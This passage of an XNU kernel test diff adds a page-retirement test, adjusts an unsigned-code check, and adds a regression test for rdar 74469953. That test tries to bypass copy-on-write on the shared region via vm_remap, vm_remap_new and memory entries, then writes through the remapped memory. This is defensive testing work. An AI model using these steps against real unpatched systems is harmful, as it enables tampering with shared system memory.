+#include <darwintest.h>
+
+/*
+ * trying phys offsets from start of dram of:
+ * watchOS 512Meg
+ * macOS 3Gig
+ * iOS,etc. 750Meg
+ */
+#if TARGET_OS_WATCH
+#define USEBOOTARG "bad_ram_pages=536870912 bad_static_mfree=1"
+#elif TARGET_OS_OSX
+#define USEBOOTARG "bad_ram_pages=3221225472 bad_static_mfree=1"
+#else
+#define USEBOOTARG "bad_ram_pages=786432000 bad_static_mfree=1"
+#endif
+
+T_DECL(retired_pages_test,
+    "Test retiring pages at boot",
+    T_META_NAMESPACE("xnu.vm"),
+    T_META_BOOTARGS_SET(USEBOOTARG),
+    T_META_ASROOT(true),
+    T_META_CHECK_LEAKS(false))
+{
+       int err;
+       unsigned int count = 0;
+       size_t s = sizeof(count);
+
+#if !defined(__arm64__) || TARGET_OS_BRIDGE
+       T_SKIP("No page retirement on x86, arm32 or bridgeOS kernels");
+#endif
+       /*
+        * Get the number of pages retired from the kernel
+        */
+       err = sysctlbyname("vm.retired_pages_count", &count, &s, NULL, 0);
+
+       /* If the sysctl isn't supported, test succeeds */
+       if (err == ENOENT) {
+               T_SKIP("sysctl vm.retired_pages_count not found, skipping test");
+       }
+       T_ASSERT_POSIX_SUCCESS(err, "sysctl vm.retired_pages_count");
+
+       T_ASSERT_GT_INT(count, 0, "Expect retired pages");
+}
index 0c429d725040c2e408bc51ed45a29711765df450..7c799c77540db6e079fdbb226e7f194d96a99a35 100644 (file)
@@ -1,3 +1,4 @@
+#include <TargetConditionals.h>
 #include <errno.h>
 #include <stdio.h>
 #include <stdlib.h>
@@ -140,13 +141,13 @@ main(
        fprintf(stdout, "%s: WARNING: unsigned code was executed\n",
            cmdname);
 
-#if CONFIG_EMBEDDED
+#if !TARGET_OS_OSX
        /* fail: unsigned code was executed */
        fprintf(stdout, "%s: FAIL\n", cmdname);
        exit(1);
-#else /* CONFIG_EMBEDDED */
+#else /* !TARGET_OS_OSX */
        /* no fail: unsigned code is only prohibited on embedded platforms */
        fprintf(stdout, "%s: SUCCESS\n", cmdname);
        exit(0);
-#endif /* CONFIG_EMBEDDED */
+#endif /* !TARGET_OS_OSX */
 }
index 2ab86744fd01e8461f216508622a5564efbe4a89..6fd927b7794e312b19fb38de193d5c338ff29e6f 100644 (file)
@@ -7,6 +7,7 @@
  */
 #include <darwintest.h>
 
+#include <dlfcn.h>
 #include <errno.h>
 #include <ptrauth.h>
 #include <stdio.h>
@@ -623,7 +624,7 @@ T_DECL(madvise_shared, "test madvise shared for rdar://problem/2295713 logging \
        }
 
 #if defined(__x86_64__) || defined(__i386__)
-       if (*((uint64_t *)_COMM_PAGE_CPU_CAPABILITIES64) & kIsTranslated) {
+       if (COMM_PAGE_READ(uint64_t, CPU_CAPABILITIES64) & kIsTranslated) {
                T_LOG("Skipping madvise reusable tests because we're running under translation.");
                goto done;
        }
@@ -672,7 +673,7 @@ T_DECL(madvise_purgeable_can_reuse, "test madvise purgeable can reuse for \
     T_META_ALL_VALID_ARCHS(true))
 {
 #if defined(__x86_64__) || defined(__i386__)
-       if (*((uint64_t *)_COMM_PAGE_CPU_CAPABILITIES64) & kIsTranslated) {
+       if (COMM_PAGE_READ(uint64_t, CPU_CAPABILITIES64) & kIsTranslated) {
                T_SKIP("madvise reusable is not supported under Rosetta translation. Skipping.)");
        }
 #endif /* defined(__x86_64__) || defined(__i386__) */
@@ -951,6 +952,677 @@ T_DECL(nested_pmap_trigger, "nested pmap should only be triggered from kernel \
        T_ASSERT_MACH_SUCCESS(kr, "vm_map()");
 }
 
+static const char *prot_str[] = { "---", "r--", "-w-", "rw-", "--x", "r-x", "-wx", "rwx" };
+static const char *share_mode_str[] = { "---", "COW", "PRIVATE", "EMPTY", "SHARED", "TRUESHARED", "PRIVATE_ALIASED", "SHARED_ALIASED", "LARGE_PAGE" };
+
+T_DECL(shared_region_share_writable, "sharing a writable mapping of the shared region shoudl not give write access to shared region - rdar://problem/74469953",
+    T_META_ALL_VALID_ARCHS(true))
+{
+       int ret;
+       uint64_t sr_start;
+       kern_return_t kr;
+       mach_vm_address_t address, tmp_address, remap_address;
+       mach_vm_size_t size, tmp_size, remap_size;
+       uint32_t depth;
+       mach_msg_type_number_t count;
+       vm_region_submap_info_data_64_t info;
+       vm_prot_t cur_prot, max_prot;
+       uint32_t before, after, remap;
+       mach_port_t mem_entry;
+
+       ret = __shared_region_check_np(&sr_start);
+       if (ret != 0) {
+               int saved_errno;
+               saved_errno = errno;
+
+               T_ASSERT_EQ(saved_errno, ENOMEM, "__shared_region_check_np() %d (%s)",
+                   saved_errno, strerror(saved_errno));
+               T_END;
+       }
+       T_LOG("SHARED_REGION_BASE 0x%llx", SHARED_REGION_BASE);
+       T_LOG("SHARED_REGION_SIZE 0x%llx", SHARED_REGION_SIZE);
+       T_LOG("shared region starts at 0x%llx", sr_start);
+       T_QUIET; T_ASSERT_GE(sr_start, SHARED_REGION_BASE,
+           "shared region starts below BASE");
+       T_QUIET; T_ASSERT_LT(sr_start, SHARED_REGION_BASE + SHARED_REGION_SIZE,
+           "shared region starts above BASE+SIZE");
+
+       /*
+        * Step 1 - check that one can not get write access to a read-only
+        * mapping in the shared region.
+        */
+       size = 0;
+       for (address = SHARED_REGION_BASE;
+           address < SHARED_REGION_BASE + SHARED_REGION_SIZE;
+           address += size) {
+               size = 0;
+               depth = 99;
+               count = VM_REGION_SUBMAP_INFO_COUNT_64;
+               kr = mach_vm_region_recurse(mach_task_self(),
+                   &address,
+                   &size,
+                   &depth,
+                   (vm_region_recurse_info_t)&info,
+                   &count);
+               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_region_recurse()");
+               if (kr == KERN_INVALID_ADDRESS) {
+                       T_SKIP("could not find read-only nested mapping");
+                       T_END;
+               }
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+               T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+                   address, address + size, depth,
+                   prot_str[info.protection],
+                   prot_str[info.max_protection],
+                   share_mode_str[info.share_mode],
+                   info.object_id);
+               if (depth > 0 &&
+                   (info.protection == VM_PROT_READ) &&
+                   (info.max_protection == VM_PROT_READ)) {
+                       /* nested and read-only: bingo! */
+                       break;
+               }
+       }
+       if (address >= SHARED_REGION_BASE + SHARED_REGION_SIZE) {
+               T_SKIP("could not find read-only nested mapping");
+               T_END;
+       }
+
+       /* test vm_remap() of RO */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_address = 0;
+       remap_size = size;
+       kr = mach_vm_remap(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,
+           VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,
+           mach_task_self(),
+           address,
+           FALSE,
+           &cur_prot,
+           &max_prot,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap()");
+//     T_QUIET; T_ASSERT_EQ(cur_prot, VM_PROT_READ, "cur_prot is read-only");
+//     T_QUIET; T_ASSERT_EQ(max_prot, VM_PROT_READ, "max_prot is read-only");
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only");
+//     T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only");
+       /* check that new mapping is read-only */
+       tmp_address = remap_address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, remap_address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "new cur_prot read-only");
+//     T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "new max_prot read-only");
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+// this would crash if actually read-only:
+//     *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("vm_remap(): 0x%llx 0x%x -> 0x%x", address, before, after);
+//     *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("vm_remap() bypassed copy-on-write");
+       } else {
+               T_PASS("vm_remap() did not bypass copy-on-write");
+       }
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+       T_PASS("vm_remap() read-only");
+
+#if defined(VM_MEMORY_ROSETTA)
+       if (dlsym(RTLD_DEFAULT, "mach_vm_remap_new") == NULL) {
+               T_PASS("vm_remap_new() is not present");
+               goto skip_vm_remap_new_ro;
+       }
+       /* test vm_remap_new() of RO */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_address = 0;
+       remap_size = size;
+       cur_prot = VM_PROT_READ | VM_PROT_WRITE;
+       max_prot = VM_PROT_READ | VM_PROT_WRITE;
+       kr = mach_vm_remap_new(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,
+           VM_FLAGS_ANYWHERE,
+           mach_task_self(),
+           address,
+           FALSE,
+           &cur_prot,
+           &max_prot,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_remap_new()");
+       if (kr == KERN_PROTECTION_FAILURE) {
+               /* wrong but not a security issue... */
+               goto skip_vm_remap_new_ro;
+       }
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap_new()");
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("vm_remap_new(): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("vm_remap_new() bypassed copy-on-write");
+       } else {
+               T_PASS("vm_remap_new() did not bypass copy-on-write");
+       }
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only");
+       T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only");
+       T_PASS("vm_remap_new() read-only");
+skip_vm_remap_new_ro:
+#else /* defined(VM_MEMORY_ROSETTA) */
+       /* pre-BigSur SDK: no vm_remap_new() */
+       T_LOG("No vm_remap_new() to test");
+#endif /* defined(VM_MEMORY_ROSETTA) */
+
+       /* test mach_make_memory_entry_64(VM_SHARE) of RO */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_size = size;
+       mem_entry = MACH_PORT_NULL;
+       kr = mach_make_memory_entry_64(mach_task_self(),
+           &remap_size,
+           address,
+           MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE,
+           &mem_entry,
+           MACH_PORT_NULL);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)");
+       if (kr == KERN_PROTECTION_FAILURE) {
+               /* wrong but not a security issue... */
+               goto skip_mem_entry_vm_share_ro;
+       }
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)");
+       remap_address = 0;
+       kr = mach_vm_map(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,              /* mask */
+           VM_FLAGS_ANYWHERE,
+           mem_entry,
+           0,              /* offset */
+           FALSE,              /* copy */
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()");
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("mem_entry(VM_SHARE): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("mem_entry(VM_SHARE) bypassed copy-on-write");
+       } else {
+               T_PASS("mem_entry(VM_SHARE) did not bypass copy-on-write");
+       }
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only");
+       T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only");
+       /* check that new mapping is a copy */
+       tmp_address = remap_address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, remap_address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_EQ(depth, 0, "new mapping is unnested");
+//     T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "new cur_prot read-only");
+//     T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "new max_prot read-only");
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+       T_PASS("mem_entry(VM_SHARE) read-only");
+skip_mem_entry_vm_share_ro:
+
+       /* test mach_make_memory_entry_64() of RO */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_size = size;
+       mem_entry = MACH_PORT_NULL;
+       kr = mach_make_memory_entry_64(mach_task_self(),
+           &remap_size,
+           address,
+           VM_PROT_READ | VM_PROT_WRITE,
+           &mem_entry,
+           MACH_PORT_NULL);
+       T_QUIET; T_ASSERT_EQ(kr, KERN_PROTECTION_FAILURE, "mach_make_memory_entry_64()");
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+//     T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_READ, "cur_prot still read-only");
+       if (depth > 0) {
+               T_QUIET; T_ASSERT_EQ(info.max_protection, VM_PROT_READ, "max_prot still read-only");
+       }
+       T_PASS("mem_entry() read-only");
+
+
+       /*
+        * Step 2 - check that one can not share write access with a writable
+        * mapping in the shared region.
+        */
+       size = 0;
+       for (address = SHARED_REGION_BASE;
+           address < SHARED_REGION_BASE + SHARED_REGION_SIZE;
+           address += size) {
+               size = 0;
+               depth = 99;
+               count = VM_REGION_SUBMAP_INFO_COUNT_64;
+               kr = mach_vm_region_recurse(mach_task_self(),
+                   &address,
+                   &size,
+                   &depth,
+                   (vm_region_recurse_info_t)&info,
+                   &count);
+               T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_region_recurse()");
+               if (kr == KERN_INVALID_ADDRESS) {
+                       T_SKIP("could not find writable nested mapping");
+                       T_END;
+               }
+               T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+               T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+                   address, address + size, depth,
+                   prot_str[info.protection],
+                   prot_str[info.max_protection],
+                   share_mode_str[info.share_mode],
+                   info.object_id);
+               if (depth > 0 && (info.protection & VM_PROT_WRITE)) {
+                       /* nested and writable: bingo! */
+                       break;
+               }
+       }
+       if (address >= SHARED_REGION_BASE + SHARED_REGION_SIZE) {
+               T_SKIP("could not find writable nested mapping");
+               T_END;
+       }
+
+       /* test vm_remap() of RW */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_address = 0;
+       remap_size = size;
+       kr = mach_vm_remap(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,
+           VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,
+           mach_task_self(),
+           address,
+           FALSE,
+           &cur_prot,
+           &max_prot,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap()");
+       if (!(cur_prot & VM_PROT_WRITE)) {
+               T_LOG("vm_remap(): 0x%llx not writable %s/%s",
+                   remap_address, prot_str[cur_prot], prot_str[max_prot]);
+               T_ASSERT_FAIL("vm_remap() remapping not writable");
+       }
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("vm_remap(): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("vm_remap() bypassed copy-on-write");
+       } else {
+               T_PASS("vm_remap() did not bypass copy-on-write");
+       }
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable");
+       T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable");
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+
+#if defined(VM_MEMORY_ROSETTA)
+       if (dlsym(RTLD_DEFAULT, "mach_vm_remap_new") == NULL) {
+               T_PASS("vm_remap_new() is not present");
+               goto skip_vm_remap_new_rw;
+       }
+       /* test vm_remap_new() of RW */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_address = 0;
+       remap_size = size;
+       cur_prot = VM_PROT_READ | VM_PROT_WRITE;
+       max_prot = VM_PROT_READ | VM_PROT_WRITE;
+       kr = mach_vm_remap_new(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,
+           VM_FLAGS_ANYWHERE,
+           mach_task_self(),
+           address,
+           FALSE,
+           &cur_prot,
+           &max_prot,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_remap_new()");
+       if (kr == KERN_PROTECTION_FAILURE) {
+               /* wrong but not a security issue... */
+               goto skip_vm_remap_new_rw;
+       }
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_remap_new()");
+       if (!(cur_prot & VM_PROT_WRITE)) {
+               T_LOG("vm_remap_new(): 0x%llx not writable %s/%s",
+                   remap_address, prot_str[cur_prot], prot_str[max_prot]);
+               T_ASSERT_FAIL("vm_remap_new() remapping not writable");
+       }
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("vm_remap_new(): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("vm_remap_new() bypassed copy-on-write");
+       } else {
+               T_PASS("vm_remap_new() did not bypass copy-on-write");
+       }
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable");
+       T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable");
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+skip_vm_remap_new_rw:
+#else /* defined(VM_MEMORY_ROSETTA) */
+       /* pre-BigSur SDK: no vm_remap_new() */
+       T_LOG("No vm_remap_new() to test");
+#endif /* defined(VM_MEMORY_ROSETTA) */
+
+       /* test mach_make_memory_entry_64(VM_SHARE) of RW */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_size = size;
+       mem_entry = MACH_PORT_NULL;
+       kr = mach_make_memory_entry_64(mach_task_self(),
+           &remap_size,
+           address,
+           MAP_MEM_VM_SHARE | VM_PROT_READ | VM_PROT_WRITE,
+           &mem_entry,
+           MACH_PORT_NULL);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)");
+       if (kr == KERN_PROTECTION_FAILURE) {
+               /* wrong but not a security issue... */
+               goto skip_mem_entry_vm_share_rw;
+       }
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64(VM_SHARE)");
+       T_QUIET; T_ASSERT_EQ(remap_size, size, "mem_entry(VM_SHARE) should cover whole mapping");
+//     T_LOG("AFTER MAKE_MEM_ENTRY(VM_SHARE) 0x%llx...", address); fflush(stdout); fflush(stderr); getchar();
+       remap_address = 0;
+       kr = mach_vm_map(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,              /* mask */
+           VM_FLAGS_ANYWHERE,
+           mem_entry,
+           0,              /* offset */
+           FALSE,              /* copy */
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_INHERIT_DEFAULT);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_map()");
+       remap = *(uint32_t *)(uintptr_t)remap_address;
+       T_QUIET; T_ASSERT_EQ(remap, before, "remap matches original");
+//     T_LOG("AFTER VM_MAP 0x%llx...", remap_address); fflush(stdout); fflush(stderr); getchar();
+       *(uint32_t *)(uintptr_t)remap_address = before + 1;
+//     T_LOG("AFTER WRITE 0x%llx...", remap_address); fflush(stdout); fflush(stderr); getchar();
+       after = *(uint32_t *)(uintptr_t)address;
+       T_LOG("mem_entry(VM_SHARE): 0x%llx 0x%x -> 0x%x", address, before, after);
+       *(uint32_t *)(uintptr_t)remap_address = before;
+       if (before != after) {
+               T_FAIL("mem_entry(VM_SHARE) bypassed copy-on-write");
+       } else {
+               T_PASS("mem_entry(VM_SHARE) did not bypass copy-on-write");
+       }
+       /* check that region is still nested */
+       tmp_address = address;
+       tmp_size = 0;
+       depth = 99;
+       count = VM_REGION_SUBMAP_INFO_COUNT_64;
+       kr = mach_vm_region_recurse(mach_task_self(),
+           &tmp_address,
+           &tmp_size,
+           &depth,
+           (vm_region_recurse_info_t)&info,
+           &count);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "vm_region_recurse()");
+       T_LOG("0x%llx - 0x%llx depth:%d %s/%s %s 0x%x",
+           tmp_address, tmp_address + tmp_size, depth,
+           prot_str[info.protection],
+           prot_str[info.max_protection],
+           share_mode_str[info.share_mode],
+           info.object_id);
+       T_QUIET; T_ASSERT_EQ(tmp_address, address, "address hasn't changed");
+//     T_QUIET; T_ASSERT_EQ(tmp_size, size, "size hasn't changed");
+       T_QUIET; T_ASSERT_GT(depth, 0, "still nested");
+       T_QUIET; T_ASSERT_EQ(info.protection, VM_PROT_DEFAULT, "cur_prot still writable");
+       T_QUIET; T_ASSERT_EQ((info.max_protection & VM_PROT_WRITE), VM_PROT_WRITE, "max_prot still writable");
+       /* cleanup */
+       kr = mach_vm_deallocate(mach_task_self(), remap_address, remap_size);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "vm_deallocate()");
+       mach_port_deallocate(mach_task_self(), mem_entry);
+skip_mem_entry_vm_share_rw:
+
+       /* test mach_make_memory_entry_64() of RW */
+       before = *(uint32_t *)(uintptr_t)address;
+       remap_size = size;
+       mem_entry = MACH_PORT_NULL;
+       kr = mach_make_memory_entry_64(mach_task_self(),
+           &remap_size,
+           address,
+           VM_PROT_READ | VM_PROT_WRITE,
+           &mem_entry,
+           MACH_PORT_NULL);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "mach_make_memory_entry_64()");
+       remap_address = 0;
+       kr = mach_vm_map(mach_task_self(),
+           &remap_address,
+           remap_size,
+           0,              /* mask */
+           VM_FLAGS_ANYWHERE,
+           mem_entry,
+           0,              /* offset */
+           FALSE,              /* copy */
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_PROT_READ | VM_PROT_WRITE,
+           VM_INHERIT_DEFAULT);
